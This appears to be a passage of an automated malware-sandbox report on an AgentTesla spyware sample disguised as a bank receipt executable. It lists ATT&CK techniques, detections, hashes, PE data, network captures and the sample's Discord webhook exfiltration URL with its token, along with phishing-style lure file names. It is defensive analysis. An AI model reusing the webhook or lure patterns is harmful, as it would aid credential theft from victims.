        Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6100, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Yara detected AgentTesla
        Source: Yara matchFile source: 00000001.00000002.575420221.0000000002C4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6100, type: MEMORYSTR

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts211
        Windows Management Instrumentation        		Path Interception311
        Process Injection        		1
        Disable or Modify Tools        		1
        OS Credential Dumping        		114
        System Information Discovery        		Remote Services11
        Archive Collected Data        		Exfiltration Over Other Network Medium3
        Ingress Tool Transfer        		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
        Deobfuscate/Decode Files or Information        		11
        Input Capture        		111
        Security Software Discovery        		Remote Desktop Protocol1
        Data from Local System        		Exfiltration Over Bluetooth11
        Encrypted Channel        		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)2
        Obfuscated Files or Information        		1
        Credentials in Registry        		131
        Virtualization/Sandbox Evasion        		SMB/Windows Admin Shares1
        Email Collection        		Automated Exfiltration4
        Non-Application Layer Protocol        		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)22
        Software Packing        		NTDS1
        Application Window Discovery        		Distributed Component Object Model11
        Input Capture        		Scheduled Transfer15
        Application Layer Protocol        		SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
        Timestomp        		LSA Secrets1
        Remote System Discovery        		SSH1
        Clipboard Data        		Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.common1
        Masquerading        		Cached Domain Credentials1
        System Network Configuration Discovery        		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup Items131
        Virtualization/Sandbox Evasion        		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job311
        Process Injection        		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        e-dekont-20230207.exe26%ReversingLabsByteCode-MSIL.Trojan.GenSteal
        e-dekont-20230207.exe100%Joe Sandbox ML

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        1.2.CasPol.exe.400000.0.unpack100%AviraHEUR/AGEN.1203035Download File

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        https://discord.com0%URL Reputationsafe
        http://discord.com0%URL Reputationsafe
        https://discord.com/api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31nnHHfghtrbDwRtJci1Osr0%Avira URL Cloudsafe
        https://discord.com/api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F310%Avira URL Cloudsafe
        https://discord.com4Dp0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        discord.com
        		162.159.128.233
        		truetrue
          		unknown
          api4.ipify.org
          		64.185.227.155
          		truefalse
            		high
            api.ipify.org
            		unknown
            		unknownfalse
              		high

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              https://api.ipify.org/false
                		high
                https://discord.com/api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31nnHHfghtrbDwRtJci1Osrtrue
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://api.ipify.orgCasPol.exe, 00000001.00000002.575420221.0000000002C01000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://discord.comCasPol.exe, 00000001.00000002.575420221.0000000002C62000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://discord.comCasPol.exe, 00000001.00000002.575420221.0000000002C62000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameCasPol.exe, 00000001.00000002.575420221.0000000002C01000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://discord.com4DpCasPol.exe, 00000001.00000002.575420221.0000000002C62000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://discord.com/api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31CasPol.exe, 00000001.00000002.575420221.0000000002C01000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    162.159.128.233
                    		discord.comUnited States
                    		13335CLOUDFLARENETUStrue
                    64.185.227.155
                    		api4.ipify.orgUnited States
                    		18450WEBNXUSfalse

                    General Information

                    Joe Sandbox Version:36.0.0 Rainbow Opal
                    Analysis ID:800710
                    Start date and time:2023-02-07 18:30:27 +01:00
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 9m 26s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Number of analysed new started processes analysed:5
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample file name:e-dekont-20230207.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@3/1@3/2
                    EGA Information:
                    • Successful, ratio: 100%
                    HDC Information:
                    • Successful, ratio: 17.7% (good quality ratio 15.8%)
                    • Quality average: 62.8%
                    • Quality standard deviation: 34.3%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 50
                    • Number of non-executed functions: 3
                    Cookbook Comments:
                    • Found application associated with file extension: .exe

                    Warnings

                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
                    • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: e-dekont-20230207.exe

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    18:31:29API Interceptor951x Sleep call for process: CasPol.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    162.159.128.233j8Vm9XHOvJ.exeGet hashmaliciousBrowse
                      Creal.exeGet hashmaliciousBrowse
                        rcm.exeGet hashmaliciousBrowse
                          qTryhm9JMV.exeGet hashmaliciousBrowse
                            main.exeGet hashmaliciousBrowse
                              e-dekont-20230202.exeGet hashmaliciousBrowse
                                Request for PO_2023.jsGet hashmaliciousBrowse
                                  e-dekont-20230201.exeGet hashmaliciousBrowse
                                    loader.exeGet hashmaliciousBrowse
                                      PDA Query - 180397-31-01-23 Port Agency Appointment_pdf.exeGet hashmaliciousBrowse
                                        Urgent Price request. P.O1672891.exeGet hashmaliciousBrowse
                                          VDVxPCDw3o7Q9av.exeGet hashmaliciousBrowse
                                            PURCHASE ORDER NO. 0028175.exeGet hashmaliciousBrowse
                                              BlitzedGrabber_.exeGet hashmaliciousBrowse
                                                E2C31090339C37FAF04CE2489EA35E9E22844B5AEF1A0.exeGet hashmaliciousBrowse
                                                  e-dekont-20230126-.exeGet hashmaliciousBrowse
                                                    3bRSL6ViWV.exeGet hashmaliciousBrowse
                                                      main.exeGet hashmaliciousBrowse
                                                        ufBgoIkDvJ.exeGet hashmaliciousBrowse
                                                          e-dekont-20230119-.exeGet hashmaliciousBrowse

                                                            Domains

                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                            discord.comRFQ-N-12192.1.exeGet hashmaliciousBrowse
                                                            • 162.159.138.232
                                                            OpVrIJpDqF.exeGet hashmaliciousBrowse
                                                            • 162.159.135.232
                                                            L0EozIGr75.exeGet hashmaliciousBrowse
                                                            • 162.159.138.232
                                                            AWVpR481pe.exeGet hashmaliciousBrowse
                                                            • 162.159.136.232
                                                            DHL SHIPMENT AND TRACKING NUMBER pdf.exeGet hashmaliciousBrowse
                                                            • 162.159.138.232
                                                            j8Vm9XHOvJ.exeGet hashmaliciousBrowse
                                                            • 162.159.128.233
                                                            MV BELLIGHT DISCH ABT 46982 MTS OF SOYABEANS IN BULK FORMAL AGENCY APPOINTMENT_pdf.exeGet hashmaliciousBrowse
                                                            • 162.159.137.232
                                                            setup.exeGet hashmaliciousBrowse
                                                            • 162.159.136.232
                                                            Built.exeGet hashmaliciousBrowse
                                                            • 162.159.136.232
                                                            Creal.exeGet hashmaliciousBrowse
                                                            • 162.159.135.232
                                                            rcm.exeGet hashmaliciousBrowse
                                                            • 162.159.136.232
                                                            main.exeGet hashmaliciousBrowse
                                                            • 162.159.128.233
                                                            S3zoj9Uts0.exeGet hashmaliciousBrowse
                                                            • 162.159.138.232
                                                            uBZeAVcb6r.exeGet hashmaliciousBrowse
                                                            • 162.159.137.232
                                                            e-dekont-20230127.exeGet hashmaliciousBrowse
                                                            • 162.159.137.232
                                                            XZdImqRrwQ.exeGet hashmaliciousBrowse
                                                            • 162.159.135.232
                                                            e-dekont-20230202.exeGet hashmaliciousBrowse
                                                            • 162.159.128.233
                                                            Request for PO_2023.jsGet hashmaliciousBrowse
                                                            • 162.159.128.233
                                                            Payload.exeGet hashmaliciousBrowse
                                                            • 162.159.135.232
                                                            e-dekont-20230201.exeGet hashmaliciousBrowse
                                                            • 162.159.128.233

                                                            ASNs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                            CLOUDFLARENETUSXQCOqfWkm8.exeGet hashmaliciousBrowse
                                                            • 162.159.134.233
                                                            ACH_Electronic_Deposit.shtmlGet hashmaliciousBrowse
                                                            • 104.17.25.14
                                                            Unv67CLhJv.exeGet hashmaliciousBrowse
                                                            • 162.159.133.233
                                                            Application_debloated.exeGet hashmaliciousBrowse
                                                            • 162.159.135.233
                                                            0x000600000001ace8-206.exeGet hashmaliciousBrowse
                                                            • 104.20.68.143
                                                            xakJ7het39.exeGet hashmaliciousBrowse
                                                            • 188.114.96.3
                                                            Hilcorp Bonus Settlement.eml (5.22 KB).msgGet hashmaliciousBrowse
                                                            • 104.17.25.14
                                                            https://www.canva.com/design/DAFZ4mIuTRk/xh916WsoV133Oxh-V4YbYw/view?utm_content=DAFZ4mIuTRk&utm_campaign=designshare&utm_medium=link&utm_source=publishsharelinkGet hashmaliciousBrowse
                                                            • 104.16.57.101
                                                            PRICE ENQUIRY ENQ REF_PDF_____________________________.........exeGet hashmaliciousBrowse
                                                            • 188.114.96.3
                                                            AR_STATEMENT_13740_ARIHANT ELECTRI_02JEN06_115700.exeGet hashmaliciousBrowse
                                                            • 104.21.79.47
                                                            https://fruitandpods.com/besnet/empresas/dcab232/Sign_in.phpGet hashmaliciousBrowse
                                                            • 104.18.1.236
                                                            210909836-042205.exeGet hashmaliciousBrowse
                                                            • 188.114.96.3
                                                            https://w0y0bz.webwave.dev/lib/w0y0bz/RFQ02062023-ldslhqdl.html#poststelle@stadt.nuernberg.deGet hashmaliciousBrowse
                                                            • 104.20.18.53
                                                            #Ud83d#Udce0 1 of 3 Pages.htmGet hashmaliciousBrowse
                                                            • 104.18.10.207
                                                            https://www.googleadservices.com/pagead/aclk?sa=L&ai=CkwvK0P_hY8HmHqzkn88PyfuFuAWgo7fvbs6fqp-VEZGs05XEOBABIIHZ_iFgyQagAZOftLAoyAEJqQLjAdLjEvh5PqgDAcgDywSqBNcBT9DF_iX400IybEW3Pr6wAP-unvMjI3QSAapE6PY1e4nW5NWKB41op30pMboy0XCoPrXu7CNTcCMGeey1XtmKUgKbua3PEd7d8iSVBezN1_nZqT0JcBzMecORTxu_F8eCphEg6iih3KhpzzdErNKbKHo4QV0ywpPFvMuZ3jo2yS4wpXHFiWkk5VTaH9WZi4OenRX7ZqzE2P8_pKVLM30PUS0k-HTbrJJ-9SAoN4qZ0SoufwzHZ2CbVg2_WHfzg3cj_ZXuCwBLBhnHmi0ale5VhZw_d81os6TABPq-rLGbBKAGLoAHnKTY_QOoB47OG6gHk9gbqAfulrECqAf-nrECqAeko7ECqAfVyRuoB6a-G6gHmgaoB_PRG6gHltgbqAeqm7ECqAf_nrECqAffn7EC2AcA0ggPCIBhEAEYHzICigI6AoBAsQkBrnSxVCnjCIAKAZgLAcgLAYAMAbgMAdgTDNAVAfgWAYAXAQ&ae=1&num=1&cid=CAQSOwDUE5ymZxT0dLU_6yG71JZyq7bVZF3KxZaaSOrqGKatE9XZNh61FPPUu9DHSG-OenQe7WgVmA55if6mGAE&sig=AOD64_1lTBUid_DTEGtbwCI40J1FZksITw&client=ca-pub-9816945270938969&rf=1&nb=9&adurl=http://nu.fekru.rlntlss.net%3A%2F%2F%23aHR0cHM6Ly9teWZhbWlseWFjdS5jb20vbmV3L2F1dGgvQ29uZGVuYXN0L2tlZWxleS5rbm93bGVzQGNvbmRlbmFzdC5jby51aw==Get hashmaliciousBrowse
                                                            • 104.17.25.14
                                                            RFQ-N-12192.1.exeGet hashmaliciousBrowse
                                                            • 162.159.138.232
                                                            http://moon-palace.caGet hashmaliciousBrowse
                                                            • 104.19.255.55
                                                            95543.htmlGet hashmaliciousBrowse
                                                            • 104.17.25.14
                                                            Please DocuSign - Documents Pending eSignature.htmlGet hashmaliciousBrowse
                                                            • 104.21.75.219
                                                            ePaQLI5RyP.exeGet hashmaliciousBrowse
                                                            • 188.114.96.3

                                                            JA3 Fingerprints

                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                            3b5074b1b5d032e5620f69f9f700ff0enotes.oneGet hashmaliciousBrowse
                                                            • 64.185.227.155
                                                            • 162.159.128.233
                                                            0x000600000001ace8-206.exeGet hashmaliciousBrowse
                                                            • 64.185.227.155
                                                            • 162.159.128.233
                                                            OR98764357890-098.exeGet hashmaliciousBrowse
                                                            • 64.185.227.155
                                                            • 162.159.128.233
                                                            PO_72302991PDF.exeGet hashmaliciousBrowse
                                                            • 64.185.227.155
                                                            • 162.159.128.233
                                                            PO-7654321.exeGet hashmaliciousBrowse
                                                            • 64.185.227.155
                                                            • 162.159.128.233
                                                            elementrv Remittance.htmlGet hashmaliciousBrowse
                                                            • 64.185.227.155
                                                            • 162.159.128.233
                                                            Solicitar Cotizacion.pdf.exeGet hashmaliciousBrowse
                                                            • 64.185.227.155
                                                            • 162.159.128.233
                                                            item.oneGet hashmaliciousBrowse
                                                            • 64.185.227.155
                                                            • 162.159.128.233
                                                            210909836-042205.exeGet hashmaliciousBrowse
                                                            • 64.185.227.155
                                                            • 162.159.128.233
                                                            AWB NO. 8148557141.exeGet hashmaliciousBrowse
                                                            • 64.185.227.155
                                                            • 162.159.128.233
                                                            FAXMESSAGE.exeGet hashmaliciousBrowse
                                                            • 64.185.227.155
                                                            • 162.159.128.233
                                                            PAGO SWIFT PDF__.pif.exeGet hashmaliciousBrowse
                                                            • 64.185.227.155
                                                            • 162.159.128.233
                                                            Original.oneGet hashmaliciousBrowse
                                                            • 64.185.227.155
                                                            • 162.159.128.233
                                                            RFQ-N-12192.1.exeGet hashmaliciousBrowse
                                                            • 64.185.227.155
                                                            • 162.159.128.233
                                                            FSSC-23-0103000RPM.PDF.exeGet hashmaliciousBrowse
                                                            • 64.185.227.155
                                                            • 162.159.128.233
                                                            svc.exeGet hashmaliciousBrowse
                                                            • 64.185.227.155
                                                            • 162.159.128.233
                                                            Req For F1 USD 33 325.00.exeGet hashmaliciousBrowse
                                                            • 64.185.227.155
                                                            • 162.159.128.233
                                                            Encargar art#U00edculos.exeGet hashmaliciousBrowse
                                                            • 64.185.227.155
                                                            • 162.159.128.233
                                                            file.vbsGet hashmaliciousBrowse
                                                            • 64.185.227.155
                                                            • 162.159.128.233
                                                            1wJ47b5qX6.exeGet hashmaliciousBrowse
                                                            • 64.185.227.155
                                                            • 162.159.128.233

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\e-dekont-20230207.exe.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\e-dekont-20230207.exe
                                                            File Type:CSV text
                                                            Category:dropped
                                                            Size (bytes):226
                                                            Entropy (8bit):5.354940450065058
                                                            Encrypted:false
                                                            SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
                                                            MD5:B10E37251C5B495643F331DB2EEC3394
                                                            SHA1:25A5FFE4C2554C2B9A7C2794C9FE215998871193
                                                            SHA-256:8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
                                                            SHA-512:296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
                                                            Malicious:true
                                                            Reputation:high, very likely benign file
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..

                                                            Static File Info

                                                            General

                                                            File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit):7.965063063447085
                                                            TrID:
                                                            • Win64 Executable GUI Net Framework (217006/5) 47.53%
                                                            • Win64 Executable GUI (202006/5) 44.25%
                                                            • Win64 Executable (generic) Net Framework (21505/4) 4.71%
                                                            • Win64 Executable (generic) (12005/4) 2.63%
                                                            • Generic Win/DOS Executable (2004/3) 0.44%
                                                            File name:e-dekont-20230207.exe
                                                            File size:688128
                                                            MD5:2fbaa4d917cce04617f24f87309286d6
                                                            SHA1:7480ce7aebd7f59da7d6bd4f9eb7bba0efe05f97
                                                            SHA256:91eb17a8906ebbe9c50ef6a509e80133fd3322aec9b84e04cc5925992235c17e
                                                            SHA512:a2776ed384951898f491546f1050a26f744701c86478865e277288d5b639723f3d96a0cb8ca3e77941155d4fafc67970f4c2b713d0e16894ca58e3f3be718825
                                                            SSDEEP:12288:OEc+106G5pJptT7f98u1548XTTtSXIK4798qdGxd3rb5Oi4W21q1ni/:O1+1pG5znHz151ntSM9zEd3rb58H1Wg
                                                            TLSH:76E42212724F57BBE6296071C8FB087B13B57305A533D8A9BF1C12886F84B5B6E99F40
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....!..................r............... ....@...... ....................................@................................

                                                            File Icon

                                                            Icon Hash:00828e8e8686b000

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x400000
                                                            Entrypoint Section:
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x9521C718 [Wed Apr 14 13:14:00 2049 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:

                                                            Entrypoint Preview

                                                            Instruction
                                                            dec ebp
                                                            pop edx
                                                            nop
                                                            add byte ptr [ebx], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax+eax], al
                                                            add byte ptr [eax], al

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xac0000x598.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0xa91580x1c.text
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x20000xa71f40xa7200False0.9709777603777113data7.972775066304571IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .sdata0xaa0000x1e80x200False0.861328125data6.632870559527538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .rsrc0xac0000x5980x600False0.4147135416666667data4.06869988795393IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            NameRVASizeTypeLanguageCountry
                                                            RT_VERSION0xac0a00x30cdata
                                                            RT_MANIFEST0xac3ac0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators

                                                            Network Behavior

                                                            Snort IDS Alerts

                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                            192.168.2.5162.159.128.233496904432851779 02/07/23-18:31:33.991128TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49690443192.168.2.5162.159.128.233

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Feb 7, 2023 18:31:28.993040085 CET49689443192.168.2.564.185.227.155
                                                            Feb 7, 2023 18:31:28.993093014 CET4434968964.185.227.155192.168.2.5
                                                            Feb 7, 2023 18:31:28.993184090 CET49689443192.168.2.564.185.227.155
                                                            Feb 7, 2023 18:31:29.022833109 CET49689443192.168.2.564.185.227.155
                                                            Feb 7, 2023 18:31:29.022871017 CET4434968964.185.227.155192.168.2.5
                                                            Feb 7, 2023 18:31:29.340893984 CET4434968964.185.227.155192.168.2.5
                                                            Feb 7, 2023 18:31:29.341072083 CET49689443192.168.2.564.185.227.155
                                                            Feb 7, 2023 18:31:29.385968924 CET49689443192.168.2.564.185.227.155
                                                            Feb 7, 2023 18:31:29.385994911 CET4434968964.185.227.155192.168.2.5
                                                            Feb 7, 2023 18:31:29.386605024 CET4434968964.185.227.155192.168.2.5
                                                            Feb 7, 2023 18:31:29.430265903 CET49689443192.168.2.564.185.227.155
                                                            Feb 7, 2023 18:31:29.658529997 CET49689443192.168.2.564.185.227.155
                                                            Feb 7, 2023 18:31:29.658596039 CET4434968964.185.227.155192.168.2.5
                                                            Feb 7, 2023 18:31:29.765906096 CET4434968964.185.227.155192.168.2.5
                                                            Feb 7, 2023 18:31:29.766043901 CET4434968964.185.227.155192.168.2.5
                                                            Feb 7, 2023 18:31:29.768034935 CET49689443192.168.2.564.185.227.155
                                                            Feb 7, 2023 18:31:29.768892050 CET49689443192.168.2.564.185.227.155
                                                            Feb 7, 2023 18:31:33.870203972 CET49690443192.168.2.5162.159.128.233
                                                            Feb 7, 2023 18:31:33.870248079 CET44349690162.159.128.233192.168.2.5
                                                            Feb 7, 2023 18:31:33.870311975 CET49690443192.168.2.5162.159.128.233
                                                            Feb 7, 2023 18:31:33.871211052 CET49690443192.168.2.5162.159.128.233
                                                            Feb 7, 2023 18:31:33.871223927 CET44349690162.159.128.233192.168.2.5
                                                            Feb 7, 2023 18:31:33.926682949 CET44349690162.159.128.233192.168.2.5
                                                            Feb 7, 2023 18:31:33.926832914 CET49690443192.168.2.5162.159.128.233
                                                            Feb 7, 2023 18:31:33.929459095 CET49690443192.168.2.5162.159.128.233
                                                            Feb 7, 2023 18:31:33.929469109 CET44349690162.159.128.233192.168.2.5
                                                            Feb 7, 2023 18:31:33.929898977 CET44349690162.159.128.233192.168.2.5
                                                            Feb 7, 2023 18:31:33.933212042 CET49690443192.168.2.5162.159.128.233
                                                            Feb 7, 2023 18:31:33.933223009 CET44349690162.159.128.233192.168.2.5
                                                            Feb 7, 2023 18:31:33.990571022 CET44349690162.159.128.233192.168.2.5
                                                            Feb 7, 2023 18:31:33.991055965 CET49690443192.168.2.5162.159.128.233
                                                            Feb 7, 2023 18:31:33.991079092 CET44349690162.159.128.233192.168.2.5
                                                            Feb 7, 2023 18:31:34.130938053 CET44349690162.159.128.233192.168.2.5
                                                            Feb 7, 2023 18:31:34.131040096 CET44349690162.159.128.233192.168.2.5
                                                            Feb 7, 2023 18:31:34.131088018 CET49690443192.168.2.5162.159.128.233
                                                            Feb 7, 2023 18:31:34.136661053 CET49690443192.168.2.5162.159.128.233

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Feb 7, 2023 18:31:28.926114082 CET5494953192.168.2.58.8.8.8
                                                            Feb 7, 2023 18:31:28.946228027 CET53549498.8.8.8192.168.2.5
                                                            Feb 7, 2023 18:31:28.960350037 CET5821853192.168.2.58.8.8.8
                                                            Feb 7, 2023 18:31:28.980236053 CET53582188.8.8.8192.168.2.5
                                                            Feb 7, 2023 18:31:33.830131054 CET6099853192.168.2.58.8.8.8
                                                            Feb 7, 2023 18:31:33.850213051 CET53609988.8.8.8192.168.2.5

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Feb 7, 2023 18:31:28.926114082 CET192.168.2.58.8.8.80x4145Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                            Feb 7, 2023 18:31:28.960350037 CET192.168.2.58.8.8.80x96d5Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                            Feb 7, 2023 18:31:33.830131054 CET192.168.2.58.8.8.80x3a38Standard query (0)discord.comA (IP address)IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Feb 7, 2023 18:31:28.946228027 CET8.8.8.8192.168.2.50x4145No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                            Feb 7, 2023 18:31:28.946228027 CET8.8.8.8192.168.2.50x4145No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                            Feb 7, 2023 18:31:28.946228027 CET8.8.8.8192.168.2.50x4145No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                            Feb 7, 2023 18:31:28.946228027 CET8.8.8.8192.168.2.50x4145No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                            Feb 7, 2023 18:31:28.980236053 CET8.8.8.8192.168.2.50x96d5No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                            Feb 7, 2023 18:31:28.980236053 CET8.8.8.8192.168.2.50x96d5No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                            Feb 7, 2023 18:31:28.980236053 CET8.8.8.8192.168.2.50x96d5No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
